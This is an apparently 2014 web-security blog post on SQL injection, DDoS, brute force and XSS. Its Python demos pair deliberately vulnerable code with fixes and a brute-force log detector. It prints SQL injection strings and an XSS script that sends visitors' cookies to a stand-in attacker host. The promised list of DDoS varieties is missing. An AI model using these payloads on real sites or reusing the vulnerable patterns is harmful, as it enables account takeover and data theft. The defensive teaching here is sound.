Published 31 March 2014
Welcome to the first in our series of posts on website security. In this series we're going to look at the common types of attacks on websites, what to do if your site is the victim of an attack, and specifically how to harden your site's code or CMS.
Today we're looking at the most common types of attacks and why hackers might want to exploit your website.
Injection attacks, and more specifically SQL injection (SQLi, for Structured Query Language injection), modify a database query by smuggling SQL syntax in through user-supplied input. SQLi exploits code that builds queries from unvalidated data, for example by concatenating a form field straight into the query string, so that a quote character in the input ends the intended value and the rest of the input is executed as part of the query. SQLi is still one of the most commonly used website exploits and can give an attacker read (and often write) access to your database tables, including user and password information. These attacks are particularly common against enterprise and e-commerce sites, where attackers expect large and valuable databases. They are also among the easiest attacks to execute, requiring no more than a single PC and a small amount of database knowledge.
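As an added example (this is not code from the original post), here is the vulnerable pattern beside its fix, in Python against an in-memory SQLite database. The table, the user rows and the attack payloads are all constructed for the demonstration, and the function names are ours; passwords are stored in plain text only to keep the example short, a real site would store salted hashes.

```python
import sqlite3

# Constructed sample data for the demo; not taken from any real site.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build a throwaway in-memory users table (plain-text passwords: demo only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: untrusted input is concatenated into the query text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the values separately from the
    query text, so quote characters in the input can never change its structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the classic payloads against both versions and collect the outcomes."""
    conn = make_db()
    # Password field payload: closes the string and appends an always-true clause.
    # Vulnerable query becomes:
    #   ... WHERE username = 'alice' AND password = '' OR '1'='1'
    always_true = "' OR '1'='1"
    # Username field payload: closes the string and comments out the password check.
    # Vulnerable query becomes:
    #   ... WHERE username = 'bob'--' AND password = 'whatever'
    comment_out = "bob'--"
    return {
        "vulnerable_always_true": login_vulnerable(conn, "alice", always_true),
        "vulnerable_comment_out": login_vulnerable(conn, comment_out, "whatever"),
        "safe_always_true": login_safe(conn, "alice", always_true),
        "safe_comment_out": login_safe(conn, comment_out, "whatever"),
        "safe_valid": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Both payloads log the attacker in through `login_vulnerable` without knowing a password; against `login_safe` they are simply compared as literal strings and fail, while the genuine credentials still work. The same idea applies to every database and language: never build SQL by string concatenation from request data.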
Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks aim to overwhelm a website rather than break into it. They flood a site with more requests than it can handle, making that site (and potentially other sites on the same server) unavailable to legitimate users. DoS attacks usually target specific ports, IP ranges or entire networks, but any connected device or service can be a target.
A DoS attack is when a single computer with an internet connection attempts to flood a server with packets. A DDoS attack is when many devices, often compromised machines spread around the world and organized into a botnet, flood the target with hundreds or thousands of requests at once. Because the traffic arrives from many sources, it cannot be stopped simply by blocking one address.
DDoS attacks come in 3 main varieties:
Brute force attacks are essentially attempts to guess a username and password by trying every possible combination (or, more commonly, every entry in a list of common passwords) against a website's login form. They are looking for weak passwords that grant the attacker access to your site. Given enough time, and with no other security practices in effect, a brute force attack will ultimately succeed, so the defenses are twofold: make passwords long and unpredictable enough that guessing them takes too long to be practical, and limit how many guesses an attacker gets by locking accounts or throttling a source after a run of failed logins. As computers become more and more powerful, the need for stronger passwords only increases.
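As an added example (not code from the original post), here is what "limit the guesses" looks like on the detection side: a small Python routine that reads authentication log lines and flags any source address with five or more failed logins inside a five-minute window. The log format, the lines themselves and the function names are all made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in an invented format; not from any real server.
# 203.0.113.7 hammers one account quickly; 198.51.100.4 fails slowly over an hour.
SAMPLE_LOG = """\
2014-03-31T10:00:01 LOGIN_FAIL user=admin ip=203.0.113.7
2014-03-31T10:00:02 LOGIN_FAIL user=admin ip=203.0.113.7
2014-03-31T10:00:03 LOGIN_FAIL user=admin ip=203.0.113.7
2014-03-31T10:00:04 LOGIN_FAIL user=admin ip=203.0.113.7
2014-03-31T10:00:05 LOGIN_FAIL user=admin ip=203.0.113.7
2014-03-31T10:00:09 LOGIN_OK   user=alice ip=198.51.100.4
2014-03-31T10:00:20 LOGIN_FAIL user=bob   ip=198.51.100.4
2014-03-31T10:15:00 LOGIN_FAIL user=bob   ip=198.51.100.4
2014-03-31T10:30:00 LOGIN_FAIL user=bob   ip=198.51.100.4
2014-03-31T10:45:00 LOGIN_FAIL user=bob   ip=198.51.100.4
2014-03-31T11:00:00 LOGIN_FAIL user=bob   ip=198.51.100.4
"""

LINE_RE = re.compile(r"^(\S+) (LOGIN_FAIL|LOGIN_OK)\s+user=(\S+)\s+ip=(\S+)$")


def parse(log_text):
    """Turn log lines into (timestamp, result, user, ip) tuples; skip lines that don't match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, result, user, ip = m.groups()
        events.append((datetime.fromisoformat(ts), result, user, ip))
    return events


def find_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Return the set of source IPs that produced >= threshold failed logins
    inside any single span of length `window` (sliding window per IP)."""
    fails = defaultdict(list)
    for ts, result, _user, ip in events:
        if result == "LOGIN_FAIL":
            fails[ip].append(ts)

    flagged = set()
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print("fast attacker(s):", find_brute_force(events))
    print("with a 1 hour window:", find_brute_force(events, window=timedelta(hours=1)))
```

With the default settings only the fast attacker is caught; the slow one stays under the threshold in every five-minute span and is only flagged when the window is widened to an hour. That is the trade-off behind every lockout policy: short windows limit false positives but let a patient attacker keep guessing, so in practice a detector like this is paired with account-level counting and a strong password policy rather than relied on alone.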
Attackers use Cross-site Scripting (XSS) to inject malicious scripts into otherwise harmless websites, typically through a comment field, search box or other input that the site echoes back to visitors without encoding it. Because the script is served as part of a trusted site, the end user's browser executes it with that site's privileges, giving the attacker access to information held in cookies or session tokens for that site. XSS is usually used to take over a user's account.
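As an added example (not code from the original post), here is the echo-it-back mistake beside the fix, in Python: a comment is rendered into an HTML page once without encoding and once with `html.escape`, and a separate helper shows the caveat that escaping alone does not cover a URL attribute. The attacker payload, the page fragment and the function names are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input: a "comment" that ships every visitor's cookies
# to an attacker-controlled host. Not from any real attack.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_comment_vulnerable(author, text):
    """Deliberately vulnerable: untrusted text goes straight into the HTML,
    so a <script> tag in a comment becomes part of the page and runs in every
    visitor's browser, with that site's cookies available to it."""
    return f"<div class='comment'><b>{author}</b>: {text}</div>"


def render_comment_safe(author, text):
    """Output encoding: html.escape turns <, >, &, \" and ' into entities, so the
    browser displays the payload as text instead of executing it."""
    return (f"<div class='comment'><b>{html.escape(author)}</b>: "
            f"{html.escape(text)}</div>")


def safe_href(url):
    """Escaping is context dependent. A link target such as javascript:alert(1)
    contains nothing html.escape would touch, yet the browser runs it on click.
    For a URL attribute, allow only http(s) links and neutralize everything else."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def contains_script_tag(page):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(safe_href("javascript:alert(1)"), safe_href("http://example.com/?a=1&b=2"))
```

Encoding output for the context it lands in (HTML body, attribute, URL, JavaScript) is the core fix. Marking the session cookie `HttpOnly` is a worthwhile second layer, since it keeps `document.cookie` from exposing the session token even if a script does get through.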
While these are the most common types of attack, they represent less than half of all known website exploits. The size and volume of attacks has grown steadily, and there is a constant arms race between server and hosting providers, who employ ever-evolving network-level protection, and attackers, who employ ever stronger attacks.
Why do hackers bother? Some are attempting to overcome a website's defenses because of a grudge or complaint against that company or site. Others work to bring sites down for commercial or political reasons (competitors, hacktivists). Many are criminally minded and attempt to extort site owners, either by obtaining potentially valuable user information or by threatening to deface the site. And some sites are simply useful to them: sites on shared hosting often sit on servers with plenty of bandwidth, so a compromised site there makes a good launching point for generating or amplifying DDoS traffic against others.
The reality is that defending against many of these attacks requires hardening of the website code itself. In coming posts we'll go into more detail about how you can harden your site's defenses over and above what we already provide at the network level.